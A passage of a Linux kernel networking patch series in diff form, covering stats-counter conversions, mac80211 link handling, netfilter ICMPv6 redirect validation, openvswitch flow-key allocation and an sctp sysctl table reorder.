+@@ -714,8 +714,8 @@ static int ipip6_rcv(struct sk_buff *skb)
+ 				net_info_ratelimited("non-ECT from %pI4 with TOS=%#x\n",
+ 						     &iph->saddr, iph->tos);
+ 			if (err > 1) {
+-				++tunnel->dev->stats.rx_frame_errors;
+-				++tunnel->dev->stats.rx_errors;
++				DEV_STATS_INC(tunnel->dev, rx_frame_errors);
++				DEV_STATS_INC(tunnel->dev, rx_errors);
+ 				goto out;
+ 			}
+ 		}
+@@ -942,7 +942,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 	if (!rt) {
+ 		rt = ip_route_output_flow(tunnel->net, &fl4, NULL);
+ 		if (IS_ERR(rt)) {
+-			dev->stats.tx_carrier_errors++;
++			DEV_STATS_INC(dev, tx_carrier_errors);
+ 			goto tx_error_icmp;
+ 		}
+ 		dst_cache_set_ip4(&tunnel->dst_cache, &rt->dst, fl4.saddr);
+@@ -950,14 +950,14 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 
+ 	if (rt->rt_type != RTN_UNICAST && rt->rt_type != RTN_LOCAL) {
+ 		ip_rt_put(rt);
+-		dev->stats.tx_carrier_errors++;
++		DEV_STATS_INC(dev, tx_carrier_errors);
+ 		goto tx_error_icmp;
+ 	}
+ 	tdev = rt->dst.dev;
+ 
+ 	if (tdev == dev) {
+ 		ip_rt_put(rt);
+-		dev->stats.collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 		goto tx_error;
+ 	}
+ 
+@@ -970,7 +970,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 		mtu = dst_mtu(&rt->dst) - t_hlen;
+ 
+ 		if (mtu < IPV4_MIN_MTU) {
+-			dev->stats.collisions++;
++			DEV_STATS_INC(dev, collisions);
+ 			ip_rt_put(rt);
+ 			goto tx_error;
+ 		}
+@@ -1009,7 +1009,7 @@ static netdev_tx_t ipip6_tunnel_xmit(struct sk_buff *skb,
+ 		struct sk_buff *new_skb = skb_realloc_headroom(skb, max_headroom);
+ 		if (!new_skb) {
+ 			ip_rt_put(rt);
+-			dev->stats.tx_dropped++;
++			DEV_STATS_INC(dev, tx_dropped);
+ 			kfree_skb(skb);
+ 			return NETDEV_TX_OK;
+ 		}
+@@ -1039,7 +1039,7 @@ tx_error_icmp:
+ 	dst_link_failure(skb);
+ tx_error:
+ 	kfree_skb(skb);
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -1058,7 +1058,7 @@ static netdev_tx_t sit_tunnel_xmit__(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ tx_error:
+ 	kfree_skb(skb);
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -1087,7 +1087,7 @@ static netdev_tx_t sit_tunnel_xmit(struct sk_buff *skb,
+ 	return NETDEV_TX_OK;
+ 
+ tx_err:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ 	return NETDEV_TX_OK;
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index bc65e5b7195b3..98a64e8d9bdaa 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1063,12 +1063,16 @@ static struct sock *__udp6_lib_demux_lookup(struct net *net,
+ 			int dif, int sdif)
+ {
+ 	unsigned short hnum = ntohs(loc_port);
+-	unsigned int hash2 = ipv6_portaddr_hash(net, loc_addr, hnum);
+-	unsigned int slot2 = hash2 & udp_table.mask;
+-	struct udp_hslot *hslot2 = &udp_table.hash2[slot2];
+-	const __portpair ports = INET_COMBINED_PORTS(rmt_port, hnum);
++	unsigned int hash2, slot2;
++	struct udp_hslot *hslot2;
++	__portpair ports;
+ 	struct sock *sk;
+ 
++	hash2 = ipv6_portaddr_hash(net, loc_addr, hnum);
++	slot2 = hash2 & udp_table.mask;
++	hslot2 = &udp_table.hash2[slot2];
++	ports = INET_COMBINED_PORTS(rmt_port, hnum);
++
+ 	udp_portaddr_for_each_entry_rcu(sk, &hslot2->head) {
+ 		if (sk->sk_state == TCP_ESTABLISHED &&
+ 		    inet6_match(net, sk, rmt_addr, loc_addr, ports, dif, sdif))
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 687b4c878d4ad..8c8ef87997a8a 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -576,7 +576,7 @@ static struct ieee80211_key *
+ ieee80211_lookup_key(struct ieee80211_sub_if_data *sdata, int link_id,
+ 		     u8 key_idx, bool pairwise, const u8 *mac_addr)
+ {
+-	struct ieee80211_local *local = sdata->local;
++	struct ieee80211_local *local __maybe_unused = sdata->local;
+ 	struct ieee80211_link_data *link = &sdata->deflink;
+ 	struct ieee80211_key *key;
+ 
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index a842f2e1c2309..de7b8a4d4bbbb 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -390,6 +390,7 @@ struct ieee80211_mgd_auth_data {
+ 	bool done, waiting;
+ 	bool peer_confirmed;
+ 	bool timeout_started;
++	int link_id;
+ 
+ 	u8 ap_addr[ETH_ALEN] __aligned(2);
+ 
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index dd9ac1f7d2ea6..46f08ec5ed760 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -2258,6 +2258,7 @@ int ieee80211_if_add(struct ieee80211_local *local, const char *name,
+ 
+ 		ret = cfg80211_register_netdevice(ndev);
+ 		if (ret) {
++			ieee80211_if_free(ndev);
+ 			free_netdev(ndev);
+ 			return ret;
+ 		}
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index d8484cd870de5..0125b3e6175b7 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -5033,6 +5033,7 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 	struct cfg80211_rx_assoc_resp resp = {
+ 		.uapsd_queues = -1,
+ 	};
++	u8 ap_mld_addr[ETH_ALEN] __aligned(2);
+ 	unsigned int link_id;
+ 
+ 	sdata_assert_lock(sdata);
+@@ -5199,6 +5200,11 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 				resp.uapsd_queues |= ieee80211_ac_to_qos_mask[ac];
+ 	}
+ 
++	if (sdata->vif.valid_links) {
++		ether_addr_copy(ap_mld_addr, sdata->vif.cfg.ap_addr);
++		resp.ap_mld_addr = ap_mld_addr;
++	}
++
+ 	ieee80211_destroy_assoc_data(sdata,
+ 				     status_code == WLAN_STATUS_SUCCESS ?
+ 					ASSOC_SUCCESS :
+@@ -5208,8 +5214,6 @@ static void ieee80211_rx_mgmt_assoc_resp(struct ieee80211_sub_if_data *sdata,
+ 	resp.len = len;
+ 	resp.req_ies = ifmgd->assoc_req_ies;
+ 	resp.req_ies_len = ifmgd->assoc_req_ies_len;
+-	if (sdata->vif.valid_links)
+-		resp.ap_mld_addr = sdata->vif.cfg.ap_addr;
+ 	cfg80211_rx_assoc_resp(sdata->dev, &resp);
+ notify_driver:
+ 	drv_mgd_complete_tx(sdata->local, sdata, &info);
+@@ -6640,6 +6644,7 @@ int ieee80211_mgd_auth(struct ieee80211_sub_if_data *sdata,
+ 	       req->ap_mld_addr ?: req->bss->bssid,
+ 	       ETH_ALEN);
+ 	auth_data->bss = req->bss;
++	auth_data->link_id = req->link_id;
+ 
+ 	if (req->auth_data_len >= 4) {
+ 		if (req->auth_type == NL80211_AUTHTYPE_SAE) {
+@@ -6658,7 +6663,8 @@ int ieee80211_mgd_auth(struct ieee80211_sub_if_data *sdata,
+ 	 * removal and re-addition of the STA entry in
+ 	 * ieee80211_prep_connection().
+ 	 */
+-	cont_auth = ifmgd->auth_data && req->bss == ifmgd->auth_data->bss;
++	cont_auth = ifmgd->auth_data && req->bss == ifmgd->auth_data->bss &&
++		    ifmgd->auth_data->link_id == req->link_id;
+ 
+ 	if (req->ie && req->ie_len) {
+ 		memcpy(&auth_data->data[auth_data->data_len],
+@@ -6982,7 +6988,8 @@ int ieee80211_mgd_assoc(struct ieee80211_sub_if_data *sdata,
+ 
+ 		/* keep sta info, bssid if matching */
+ 		match = ether_addr_equal(ifmgd->auth_data->ap_addr,
+-					 assoc_data->ap_addr);
++					 assoc_data->ap_addr) &&
++			ifmgd->auth_data->link_id == req->link_id;
+ 		ieee80211_destroy_auth_data(sdata, match);
+ 	}
+ 
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 874f2a4d831d0..cc10ee1ff8e93 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -2973,7 +2973,7 @@ static struct sk_buff *ieee80211_build_hdr(struct ieee80211_sub_if_data *sdata,
+ 
+ 		if (pre_conf_link_id != link_id &&
+ 		    link_id != IEEE80211_LINK_UNSPECIFIED) {
+-#ifdef CPTCFG_MAC80211_VERBOSE_DEBUG
++#ifdef CONFIG_MAC80211_VERBOSE_DEBUG
+ 			net_info_ratelimited("%s: dropped frame to %pM with bad link ID request (%d vs. %d)\n",
+ 					     sdata->name, hdr.addr1,
+ 					     pre_conf_link_id, link_id);
+diff --git a/net/mctp/device.c b/net/mctp/device.c
+index 99a3bda8852f8..acb97b2574289 100644
+--- a/net/mctp/device.c
++++ b/net/mctp/device.c
+@@ -429,12 +429,6 @@ static void mctp_unregister(struct net_device *dev)
+ 	struct mctp_dev *mdev;
+ 
+ 	mdev = mctp_dev_get_rtnl(dev);
+-	if (mdev && !mctp_known(dev)) {
+-		// Sanity check, should match what was set in mctp_register
+-		netdev_warn(dev, "%s: BUG mctp_ptr set for unknown type %d",
+-			    __func__, dev->type);
+-		return;
+-	}
+ 	if (!mdev)
+ 		return;
+ 
+@@ -451,14 +445,8 @@ static int mctp_register(struct net_device *dev)
+ 	struct mctp_dev *mdev;
+ 
+ 	/* Already registered? */
+-	mdev = rtnl_dereference(dev->mctp_ptr);
+-
+-	if (mdev) {
+-		if (!mctp_known(dev))
+-			netdev_warn(dev, "%s: BUG mctp_ptr set for unknown type %d",
+-				    __func__, dev->type);
++	if (rtnl_dereference(dev->mctp_ptr))
+ 		return 0;
+-	}
+ 
+ 	/* only register specific types */
+ 	if (!mctp_known(dev))
+diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
+index 51ad557a525b5..b5ae419661b80 100644
+--- a/net/netfilter/ipvs/ip_vs_core.c
++++ b/net/netfilter/ipvs/ip_vs_core.c
+@@ -132,21 +132,21 @@ ip_vs_in_stats(struct ip_vs_conn *cp, struct sk_buff *skb)
+ 
+ 		s = this_cpu_ptr(dest->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		svc = rcu_dereference(dest->svc);
+ 		s = this_cpu_ptr(svc->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.inpkts++;
+-		s->cnt.inbytes += skb->len;
++		u64_stats_inc(&s->cnt.inpkts);
++		u64_stats_add(&s->cnt.inbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		local_bh_enable();
+@@ -168,21 +168,21 @@ ip_vs_out_stats(struct ip_vs_conn *cp, struct sk_buff *skb)
+ 
+ 		s = this_cpu_ptr(dest->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		svc = rcu_dereference(dest->svc);
+ 		s = this_cpu_ptr(svc->stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 		u64_stats_update_begin(&s->syncp);
+-		s->cnt.outpkts++;
+-		s->cnt.outbytes += skb->len;
++		u64_stats_inc(&s->cnt.outpkts);
++		u64_stats_add(&s->cnt.outbytes, skb->len);
+ 		u64_stats_update_end(&s->syncp);
+ 
+ 		local_bh_enable();
+@@ -200,17 +200,17 @@ ip_vs_conn_stats(struct ip_vs_conn *cp, struct ip_vs_service *svc)
+ 
+ 	s = this_cpu_ptr(cp->dest->stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	s = this_cpu_ptr(svc->stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	s = this_cpu_ptr(ipvs->tot_stats.cpustats);
+ 	u64_stats_update_begin(&s->syncp);
+-	s->cnt.conns++;
++	u64_stats_inc(&s->cnt.conns);
+ 	u64_stats_update_end(&s->syncp);
+ 
+ 	local_bh_enable();
+diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
+index 988222fff9f02..03af6a2ffd567 100644
+--- a/net/netfilter/ipvs/ip_vs_ctl.c
++++ b/net/netfilter/ipvs/ip_vs_ctl.c
+@@ -2297,11 +2297,11 @@ static int ip_vs_stats_percpu_show(struct seq_file *seq, void *v)
+ 
+ 		do {
+ 			start = u64_stats_fetch_begin_irq(&u->syncp);
+-			conns = u->cnt.conns;
+-			inpkts = u->cnt.inpkts;
+-			outpkts = u->cnt.outpkts;
+-			inbytes = u->cnt.inbytes;
+-			outbytes = u->cnt.outbytes;
++			conns = u64_stats_read(&u->cnt.conns);
++			inpkts = u64_stats_read(&u->cnt.inpkts);
++			outpkts = u64_stats_read(&u->cnt.outpkts);
++			inbytes = u64_stats_read(&u->cnt.inbytes);
++			outbytes = u64_stats_read(&u->cnt.outbytes);
+ 		} while (u64_stats_fetch_retry_irq(&u->syncp, start));
+ 
+ 		seq_printf(seq, "%3X %8LX %8LX %8LX %16LX %16LX\n",
+diff --git a/net/netfilter/ipvs/ip_vs_est.c b/net/netfilter/ipvs/ip_vs_est.c
+index 9a1a7af6a186a..f53150d82a92d 100644
+--- a/net/netfilter/ipvs/ip_vs_est.c
++++ b/net/netfilter/ipvs/ip_vs_est.c
+@@ -67,11 +67,11 @@ static void ip_vs_read_cpu_stats(struct ip_vs_kstats *sum,
+ 		if (add) {
+ 			do {
+ 				start = u64_stats_fetch_begin(&s->syncp);
+-				conns = s->cnt.conns;
+-				inpkts = s->cnt.inpkts;
+-				outpkts = s->cnt.outpkts;
+-				inbytes = s->cnt.inbytes;
+-				outbytes = s->cnt.outbytes;
++				conns = u64_stats_read(&s->cnt.conns);
++				inpkts = u64_stats_read(&s->cnt.inpkts);
++				outpkts = u64_stats_read(&s->cnt.outpkts);
++				inbytes = u64_stats_read(&s->cnt.inbytes);
++				outbytes = u64_stats_read(&s->cnt.outbytes);
+ 			} while (u64_stats_fetch_retry(&s->syncp, start));
+ 			sum->conns += conns;
+ 			sum->inpkts += inpkts;
+@@ -82,11 +82,11 @@ static void ip_vs_read_cpu_stats(struct ip_vs_kstats *sum,
+ 			add = true;
+ 			do {
+ 				start = u64_stats_fetch_begin(&s->syncp);
+-				sum->conns = s->cnt.conns;
+-				sum->inpkts = s->cnt.inpkts;
+-				sum->outpkts = s->cnt.outpkts;
+-				sum->inbytes = s->cnt.inbytes;
+-				sum->outbytes = s->cnt.outbytes;
++				sum->conns = u64_stats_read(&s->cnt.conns);
++				sum->inpkts = u64_stats_read(&s->cnt.inpkts);
++				sum->outpkts = u64_stats_read(&s->cnt.outpkts);
++				sum->inbytes = u64_stats_read(&s->cnt.inbytes);
++				sum->outbytes = u64_stats_read(&s->cnt.outbytes);
+ 			} while (u64_stats_fetch_retry(&s->syncp, start));
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_proto_icmpv6.c b/net/netfilter/nf_conntrack_proto_icmpv6.c
+index 61e3b05cf02c3..1020d67600a95 100644
+--- a/net/netfilter/nf_conntrack_proto_icmpv6.c
++++ b/net/netfilter/nf_conntrack_proto_icmpv6.c
+@@ -129,6 +129,56 @@ static void icmpv6_error_log(const struct sk_buff *skb,
+ 	nf_l4proto_log_invalid(skb, state, IPPROTO_ICMPV6, "%s", msg);
+ }
+ 
++static noinline_for_stack int
++nf_conntrack_icmpv6_redirect(struct nf_conn *tmpl, struct sk_buff *skb,
++			     unsigned int dataoff,
++			     const struct nf_hook_state *state)
++{
++	u8 hl = ipv6_hdr(skb)->hop_limit;
++	union nf_inet_addr outer_daddr;
++	union {
++		struct nd_opt_hdr nd_opt;
++		struct rd_msg rd_msg;
++	} tmp;
++	const struct nd_opt_hdr *nd_opt;
++	const struct rd_msg *rd_msg;
++
++	rd_msg = skb_header_pointer(skb, dataoff, sizeof(*rd_msg), &tmp.rd_msg);
++	if (!rd_msg) {
++		icmpv6_error_log(skb, state, "short redirect");
++		return -NF_ACCEPT;
++	}
++
++	if (rd_msg->icmph.icmp6_code != 0)
++		return NF_ACCEPT;
++
++	if (hl != 255 || !(ipv6_addr_type(&ipv6_hdr(skb)->saddr) & IPV6_ADDR_LINKLOCAL)) {
++		icmpv6_error_log(skb, state, "invalid saddr or hoplimit for redirect");
++		return -NF_ACCEPT;
++	}
++
++	dataoff += sizeof(*rd_msg);
++
++	/* warning: rd_msg no longer usable after this call */
++	nd_opt = skb_header_pointer(skb, dataoff, sizeof(*nd_opt), &tmp.nd_opt);
++	if (!nd_opt || nd_opt->nd_opt_len == 0) {
++		icmpv6_error_log(skb, state, "redirect without options");
++		return -NF_ACCEPT;
++	}
++
++	/* We could call ndisc_parse_options(), but it would need
++	 * skb_linearize() and a bit more work.
++	 */
++	if (nd_opt->nd_opt_type != ND_OPT_REDIRECT_HDR)
++		return NF_ACCEPT;
++
++	memcpy(&outer_daddr.ip6, &ipv6_hdr(skb)->daddr,
++	       sizeof(outer_daddr.ip6));
++	dataoff += 8;
++	return nf_conntrack_inet_error(tmpl, skb, dataoff, state,
++				       IPPROTO_ICMPV6, &outer_daddr);
++}
++
+ int nf_conntrack_icmpv6_error(struct nf_conn *tmpl,
+ 			      struct sk_buff *skb,
+ 			      unsigned int dataoff,
+@@ -159,6 +209,9 @@ int nf_conntrack_icmpv6_error(struct nf_conn *tmpl,
+ 		return NF_ACCEPT;
+ 	}
+ 
++	if (icmp6h->icmp6_type == NDISC_REDIRECT)
++		return nf_conntrack_icmpv6_redirect(tmpl, skb, dataoff, state);
++
+ 	/* is not error message ? */
+ 	if (icmp6h->icmp6_type >= 128)
+ 		return NF_ACCEPT;
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 0fdcdb2c9ae43..4d9b99abe37d6 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -383,12 +383,12 @@ static void flow_offload_ipv6_mangle(struct nf_flow_rule *flow_rule,
+ 				     const __be32 *addr, const __be32 *mask)
+ {
+ 	struct flow_action_entry *entry;
+-	int i, j;
++	int i;
+ 
+-	for (i = 0, j = 0; i < sizeof(struct in6_addr) / sizeof(u32); i += sizeof(u32), j++) {
++	for (i = 0; i < sizeof(struct in6_addr) / sizeof(u32); i++) {
+ 		entry = flow_action_entry_next(flow_rule);
+ 		flow_offload_mangle(entry, FLOW_ACT_MANGLE_HDR_TYPE_IP6,
+-				    offset + i, &addr[j], mask);
++				    offset + i * sizeof(u32), &addr[i], mask);
+ 	}
+ }
+ 
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index 8b84869eb2ac7..fa0f1952d7637 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -948,6 +948,7 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	struct sw_flow_mask mask;
+ 	struct sk_buff *reply;
+ 	struct datapath *dp;
++	struct sw_flow_key *key;
+ 	struct sw_flow_actions *acts;
+ 	struct sw_flow_match match;
+ 	u32 ufid_flags = ovs_nla_get_ufid_flags(a[OVS_FLOW_ATTR_UFID_FLAGS]);
+@@ -975,24 +976,26 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	/* Extract key. */
+-	ovs_match_init(&match, &new_flow->key, false, &mask);
++	key = kzalloc(sizeof(*key), GFP_KERNEL);
++	if (!key) {
++		error = -ENOMEM;
++		goto err_kfree_key;
++	}
++
++	ovs_match_init(&match, key, false, &mask);
+ 	error = ovs_nla_get_match(net, &match, a[OVS_FLOW_ATTR_KEY],
+ 				  a[OVS_FLOW_ATTR_MASK], log);
+ 	if (error)
+ 		goto err_kfree_flow;
+ 
++	ovs_flow_mask_key(&new_flow->key, key, true, &mask);
++
+ 	/* Extract flow identifier. */
+ 	error = ovs_nla_get_identifier(&new_flow->id, a[OVS_FLOW_ATTR_UFID],
+-				       &new_flow->key, log);
++				       key, log);
+ 	if (error)
+ 		goto err_kfree_flow;
+ 
+-	/* unmasked key is needed to match when ufid is not used. */
+-	if (ovs_identifier_is_key(&new_flow->id))
+-		match.key = new_flow->id.unmasked_key;
+-
+-	ovs_flow_mask_key(&new_flow->key, &new_flow->key, true, &mask);
+-
+ 	/* Validate actions. */
+ 	error = ovs_nla_copy_actions(net, a[OVS_FLOW_ATTR_ACTIONS],
+ 				     &new_flow->key, &acts, log);
+@@ -1019,7 +1022,7 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	if (ovs_identifier_is_ufid(&new_flow->id))
+ 		flow = ovs_flow_tbl_lookup_ufid(&dp->table, &new_flow->id);
+ 	if (!flow)
+-		flow = ovs_flow_tbl_lookup(&dp->table, &new_flow->key);
++		flow = ovs_flow_tbl_lookup(&dp->table, key);
+ 	if (likely(!flow)) {
+ 		rcu_assign_pointer(new_flow->sf_acts, acts);
+ 
+@@ -1089,6 +1092,8 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	if (reply)
+ 		ovs_notify(&dp_flow_genl_family, reply, info);
++
++	kfree(key);
+ 	return 0;
+ 
+ err_unlock_ovs:
+@@ -1098,6 +1103,8 @@ err_kfree_acts:
+ 	ovs_nla_free_flow_actions(acts);
+ err_kfree_flow:
+ 	ovs_flow_free(new_flow, false);
++err_kfree_key:
++	kfree(key);
+ error:
+ 	return error;
+ }
+diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
+index 4a07ab094a84e..ead5418c126e3 100644
+--- a/net/openvswitch/flow_netlink.c
++++ b/net/openvswitch/flow_netlink.c
+@@ -2309,7 +2309,7 @@ static struct sw_flow_actions *nla_alloc_flow_actions(int size)
+ 
+ 	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);
+ 
+-	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);
++	sfa = kmalloc(kmalloc_size_roundup(sizeof(*sfa) + size), GFP_KERNEL);
+ 	if (!sfa)
+ 		return ERR_PTR(-ENOMEM);
+ 
+diff --git a/net/rxrpc/output.c b/net/rxrpc/output.c
+index 9683617db7049..08c117bc083ec 100644
+--- a/net/rxrpc/output.c
++++ b/net/rxrpc/output.c
+@@ -93,7 +93,7 @@ static size_t rxrpc_fill_out_ack(struct rxrpc_connection *conn,
+ 	*_hard_ack = hard_ack;
+ 	*_top = top;
+ 
+-	pkt->ack.bufferSpace	= htons(8);
++	pkt->ack.bufferSpace	= htons(0);
+ 	pkt->ack.maxSkew	= htons(0);
+ 	pkt->ack.firstPacket	= htonl(hard_ack + 1);
+ 	pkt->ack.previousPacket	= htonl(call->ackr_highest_seq);
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index 3c3a626459deb..d4e4e94f4f987 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -716,7 +716,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 			if (call->tx_total_len != -1 ||
+ 			    call->tx_pending ||
+ 			    call->tx_top != 0)
+-				goto error_put;
++				goto out_put_unlock;
+ 			call->tx_total_len = p.call.tx_total_len;
+ 		}
+ 	}
+diff --git a/net/sched/ematch.c b/net/sched/ematch.c
+index 4ce6813618515..5c1235e6076ae 100644
+--- a/net/sched/ematch.c
++++ b/net/sched/ematch.c
+@@ -255,6 +255,8 @@ static int tcf_em_validate(struct tcf_proto *tp,
+ 			 * the value carried.
+ 			 */
+ 			if (em_hdr->flags & TCF_EM_SIMPLE) {
++				if (em->ops->datalen > 0)
++					goto errout;
+ 				if (data_len < sizeof(u32))
+ 					goto errout;
+ 				em->data = *(u32 *) data;
+diff --git a/net/sctp/sysctl.c b/net/sctp/sysctl.c
+index b46a416787ec3..43ebf090029d7 100644
+--- a/net/sctp/sysctl.c
++++ b/net/sctp/sysctl.c
+@@ -84,17 +84,18 @@ static struct ctl_table sctp_table[] = {
+ 	{ /* sentinel */ }
+ };
+ 
++/* The following index defines are used in sctp_sysctl_net_register().
++ * If you add new items to the sctp_net_table, please ensure that
++ * the index values of these defines hold the same meaning indicated by
++ * their macro names when they appear in sctp_net_table.
++ */
++#define SCTP_RTO_MIN_IDX       0
++#define SCTP_RTO_MAX_IDX       1
++#define SCTP_PF_RETRANS_IDX    2
++#define SCTP_PS_RETRANS_IDX    3
++
+ static struct ctl_table sctp_net_table[] = {
+-	{
+-		.procname	= "rto_initial",
+-		.data		= &init_net.sctp.rto_initial,
+-		.maxlen		= sizeof(unsigned int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1         = SYSCTL_ONE,
+-		.extra2         = &timer_max
+-	},
+-	{
++	[SCTP_RTO_MIN_IDX] = {
+ 		.procname	= "rto_min",
+ 		.data		= &init_net.sctp.rto_min,
+ 		.maxlen		= sizeof(unsigned int),
+@@ -103,7 +104,7 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1         = SYSCTL_ONE,
+ 		.extra2         = &init_net.sctp.rto_max
+ 	},
+-	{
++	[SCTP_RTO_MAX_IDX] =  {
+ 		.procname	= "rto_max",
+ 		.data		= &init_net.sctp.rto_max,
+ 		.maxlen		= sizeof(unsigned int),
+@@ -112,6 +113,33 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1         = &init_net.sctp.rto_min,
+ 		.extra2         = &timer_max
+ 	},
++	[SCTP_PF_RETRANS_IDX] = {
++		.procname	= "pf_retrans",
++		.data		= &init_net.sctp.pf_retrans,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &init_net.sctp.ps_retrans,
++	},
++	[SCTP_PS_RETRANS_IDX] = {
++		.procname	= "ps_retrans",
++		.data		= &init_net.sctp.ps_retrans,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1		= &init_net.sctp.pf_retrans,
++		.extra2		= &ps_retrans_max,
++	},
++	{
++		.procname	= "rto_initial",
++		.data		= &init_net.sctp.rto_initial,
++		.maxlen		= sizeof(unsigned int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec_minmax,
++		.extra1         = SYSCTL_ONE,
++		.extra2         = &timer_max
++	},
+ 	{
+ 		.procname	= "rto_alpha_exp_divisor",
+ 		.data		= &init_net.sctp.rto_alpha,
+@@ -207,24 +235,6 @@ static struct ctl_table sctp_net_table[] = {
+ 		.extra1		= SYSCTL_ONE,
+ 		.extra2		= SYSCTL_INT_MAX,
+ 	},
+-	{
+-		.procname	= "pf_retrans",
+-		.data		= &init_net.sctp.pf_retrans,
+-		.maxlen		= sizeof(int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1		= SYSCTL_ZERO,
+-		.extra2		= &init_net.sctp.ps_retrans,
+-	},
+-	{
+-		.procname	= "ps_retrans",
+-		.data		= &init_net.sctp.ps_retrans,
+-		.maxlen		= sizeof(int),
+-		.mode		= 0644,
+-		.proc_handler	= proc_dointvec_minmax,
+-		.extra1		= &init_net.sctp.pf_retrans,
+-		.extra2		= &ps_retrans_max,
+-	},
+ 	{
+ 		.procname	= "sndbuf_policy",
+ 		.data		= &init_net.sctp.sndbuf_policy,
+@@ -586,6 +596,11 @@ int sctp_sysctl_net_register(struct net *net)
+ 	for (i = 0; table[i].data; i++)
+ 		table[i].data += (char *)(&net->sctp) - (char *)&init_net.sctp;
+ 
++	table[SCTP_RTO_MIN_IDX].extra2 = &net->sctp.rto_max;
